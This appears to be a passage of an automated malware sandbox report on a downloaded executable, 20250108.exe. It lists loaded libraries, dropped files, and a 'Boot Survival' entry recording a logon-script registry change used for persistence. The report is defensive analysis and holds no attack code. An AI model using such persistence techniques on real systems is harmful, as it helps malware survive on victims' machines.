          Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dll
          Source: C:\Windows\System32\OpenWith.exeSection loaded: windowscodecs.dll
          Source: C:\Windows\System32\OpenWith.exeSection loaded: thumbcache.dll
          Source: C:\Windows\System32\OpenWith.exeSection loaded: policymanager.dll
          Source: C:\Windows\System32\OpenWith.exeSection loaded: msvcp110_win.dll
          Source: C:\Windows\System32\OpenWith.exeSection loaded: apphelp.dll
          Source: C:\Windows\System32\OpenWith.exeSection loaded: appresolver.dll
          Source: C:\Windows\System32\OpenWith.exeSection loaded: bcp47langs.dll
          Source: C:\Windows\System32\OpenWith.exeSection loaded: slc.dll
          Source: C:\Windows\System32\OpenWith.exeSection loaded: userenv.dll
          Source: C:\Windows\System32\OpenWith.exeSection loaded: sppc.dll
          Source: C:\Windows\System32\OpenWith.exeSection loaded: tiledatarepository.dll
          Source: C:\Windows\System32\OpenWith.exeSection loaded: staterepository.core.dll
          Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.staterepository.dll
          Source: C:\Windows\System32\OpenWith.exeSection loaded: wtsapi32.dll
          Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.staterepositorycore.dll
          Source: C:\Windows\System32\OpenWith.exeSection loaded: mrmcorer.dll
          Source: C:\Windows\System32\OpenWith.exeSection loaded: appxdeploymentclient.dll
          Source: C:\Windows\System32\OpenWith.exeSection loaded: sxs.dll
          Source: C:\Windows\System32\OpenWith.exeSection loaded: directmanipulation.dll
          Source: C:\Windows\System32\OpenWith.exeSection loaded: textshaping.dll
          Source: C:\Program Files\7-Zip\7zG.exeSection loaded: kernel.appcore.dll
          Source: C:\Program Files\7-Zip\7zG.exeSection loaded: uxtheme.dll
          Source: C:\Program Files\7-Zip\7zG.exeSection loaded: cryptbase.dll
          Source: C:\Program Files\7-Zip\7zG.exeSection loaded: explorerframe.dll
          Source: C:\Program Files\7-Zip\7zG.exeSection loaded: textshaping.dll
          Source: C:\Program Files\7-Zip\7zG.exeSection loaded: textinputframework.dll
          Source: C:\Program Files\7-Zip\7zG.exeSection loaded: coreuicomponents.dll
          Source: C:\Program Files\7-Zip\7zG.exeSection loaded: coremessaging.dll
          Source: C:\Program Files\7-Zip\7zG.exeSection loaded: ntmarta.dll
          Source: C:\Program Files\7-Zip\7zG.exeSection loaded: coremessaging.dll
          Source: C:\Program Files\7-Zip\7zG.exeSection loaded: wintypes.dll
          Source: C:\Program Files\7-Zip\7zG.exeSection loaded: wintypes.dll
          Source: C:\Program Files\7-Zip\7zG.exeSection loaded: wintypes.dll
          Source: C:\Program Files\7-Zip\7zG.exeSection loaded: kernel.appcore.dll
          Source: C:\Program Files\7-Zip\7zG.exeSection loaded: uxtheme.dll
          Source: C:\Program Files\7-Zip\7zG.exeSection loaded: cryptbase.dll
          Source: C:\Program Files\7-Zip\7zG.exeSection loaded: explorerframe.dll
          Source: C:\Program Files\7-Zip\7zG.exeSection loaded: textshaping.dll
          Source: C:\Program Files\7-Zip\7zG.exeSection loaded: textinputframework.dll
          Source: C:\Program Files\7-Zip\7zG.exeSection loaded: coreuicomponents.dll
          Source: C:\Program Files\7-Zip\7zG.exeSection loaded: coremessaging.dll
          Source: C:\Program Files\7-Zip\7zG.exeSection loaded: ntmarta.dll
          Source: C:\Program Files\7-Zip\7zG.exeSection loaded: coremessaging.dll
          Source: C:\Program Files\7-Zip\7zG.exeSection loaded: wintypes.dll
          Source: C:\Program Files\7-Zip\7zG.exeSection loaded: wintypes.dll
          Source: C:\Program Files\7-Zip\7zG.exeSection loaded: wintypes.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: mscoree.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: apphelp.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: kernel.appcore.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: version.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: vcruntime140_clr0400.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: uxtheme.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: windows.storage.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: wldp.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: profapi.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: cryptsp.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: rsaenh.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: cryptbase.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: propsys.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: edputil.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: urlmon.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: iertutil.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: srvcli.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: netutils.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: windows.staterepositoryps.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: sspicli.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: wintypes.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: appresolver.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: bcp47langs.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: slc.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: userenv.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: sppc.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: onecorecommonproxystub.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: onecoreuapcommonproxystub.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: mpr.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: pcacli.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: sfc_os.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: mscoree.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: apphelp.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: kernel.appcore.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: version.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: vcruntime140_clr0400.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: uxtheme.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: winmm.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: mswsock.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: napinsp.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: pnrpnsp.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: wshbth.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: nlaapi.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: iphlpapi.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: dnsapi.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: winrnr.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: fwpuclnt.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: rasadhlp.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: dxgi.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: dinput8.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: inputhost.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: coremessaging.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: propsys.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: wintypes.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: coreuicomponents.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: ntmarta.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: resourcepolicyclient.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: devenum.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: devobj.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: msasn1.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: msdmo.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
          Source: C:\Windows\regedit.exeSection loaded: authz.dll
          Source: C:\Windows\regedit.exeSection loaded: aclui.dll
          Source: C:\Windows\regedit.exeSection loaded: ulib.dll
          Source: C:\Windows\regedit.exeSection loaded: clb.dll
          Source: C:\Windows\regedit.exeSection loaded: uxtheme.dll
          Source: C:\Windows\regedit.exeSection loaded: ntdsapi.dll
          Source: C:\Windows\regedit.exeSection loaded: xmllite.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: windowscodecs.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: mscoree.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: kernel.appcore.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: version.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: vcruntime140_clr0400.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: uxtheme.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: windows.storage.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: wldp.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: profapi.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: cryptsp.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: rsaenh.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: cryptbase.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: propsys.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: edputil.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: urlmon.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: iertutil.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: srvcli.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: netutils.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: windows.staterepositoryps.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: sspicli.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: wintypes.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: appresolver.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: bcp47langs.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: slc.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: userenv.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: sppc.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: onecorecommonproxystub.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: onecoreuapcommonproxystub.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: mpr.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: pcacli.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: sfc_os.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: mscoree.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: kernel.appcore.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: version.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: vcruntime140_clr0400.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: uxtheme.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: winmm.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: mswsock.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: napinsp.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: pnrpnsp.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: wshbth.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: nlaapi.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: iphlpapi.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: dnsapi.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: winrnr.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: fwpuclnt.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: rasadhlp.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: dxgi.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: dinput8.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: inputhost.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: coremessaging.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: propsys.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: wintypes.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: coreuicomponents.dll
          Source: C:\Users\user\Downloads\????\?????\20250108.exeSection loaded: ntmarta.dll
          Source: C:\Windows\System32\OpenWith.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
          Source: C:\Program Files\7-Zip\7zG.exeFile created: C:\Users\user\Downloads\?????\20250108.exeJump to dropped file
          Source: C:\Program Files\7-Zip\7zG.exeFile created: C:\Users\user\Downloads\?????\l.dllJump to dropped file
          Source: C:\Users\user\Downloads\????\?????\20250108.exeFile created: C:\Users\Public\Documents\1.jpgJump to dropped file

          Boot Survival

          barindex
          Source: C:\Windows\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager\Environment UserInitMprLogonScript
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
          Source: C:\Users\user\Downloads\????\?????\20250108.exeKey value created or modified: HKEY_CURRENT_USER\Console\1 d33f351a4aeea5e608853d1a56661059
          Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Downloads\????\?????\20250108.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Downloads\????\?????\20250108.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Downloads\????\?????\20250108.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Downloads\????\?????\20250108.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Downloads\????\?????\20250108.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Downloads\????\?????\20250108.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Downloads\????\?????\20250108.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Downloads\????\?????\20250108.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Downloads\????\?????\20250108.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Downloads\????\?????\20250108.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Downloads\????\?????\20250108.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Downloads\????\?????\20250108.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Downloads\????\?????\20250108.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Downloads\????\?????\20250108.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Downloads\????\?????\20250108.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Downloads\????\?????\20250108.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Downloads\????\?????\20250108.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Downloads\????\?????\20250108.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Downloads\????\?????\20250108.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Downloads\????\?????\20250108.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Downloads\????\?????\20250108.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Downloads\????\?????\20250108.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Downloads\????\?????\20250108.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Downloads\????\?????\20250108.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Downloads\????\?????\20250108.exeProcess information set: NOOPENFILEERRORBOX
